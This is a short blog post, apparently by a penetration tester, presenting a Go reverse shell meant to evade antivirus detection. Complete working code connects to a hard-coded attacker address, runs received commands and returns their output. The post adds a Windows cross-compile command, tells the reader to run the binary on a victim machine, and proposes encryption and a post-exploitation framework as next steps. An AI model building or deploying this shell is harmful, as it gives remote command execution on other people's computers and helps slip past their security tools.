Undetectable Reverse shell with golang
I was exploring different methods to evade AV engines which will be helpful during Pen-testing Engagements. Since most of the malware's are written on C#, C++ and python(Because it supports cross-platform).Most of the PowerShell and DDE injection methods were detected with AV solution so I taught of giving a try with golang because Go has many features such as concurrency and also its compiled to machine code so it has good performance.
Getting Started
All we need is to write a simple script to connect to the network port and read the input from the network port and execute the command and redirect the stdout and stderr to the same network socket.
package main
import (
"bufio"
"fmt"
"net"
"os/exec"
"strings"
)
func main() {
conn, _ := net.Dial("tcp", "10.1.75.200:8081")
for {
message, _ := bufio.NewReader(conn).ReadString('\n')
out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
if err != nil {
fmt.Fprintf(conn, "%s\n",err)
}
fmt.Fprintf(conn, "%s\n",out)
}
}
Source:
https://github.com/sathish09/rev2go
We can build the go file to any format by specifying the os and architecture.
env GOOS=windows GOARCH=386 go build hello.go
Start the listener in the attacker box and transfer the file to the victim machine and run it.
We will get a reverse connection once the victim runs the executable.
AV Scan Results:
So What’s next ?
Implement encryption and memory protection. Make it more interactive.. Build a post-exploitation framework and what not.. Go is awesome 😉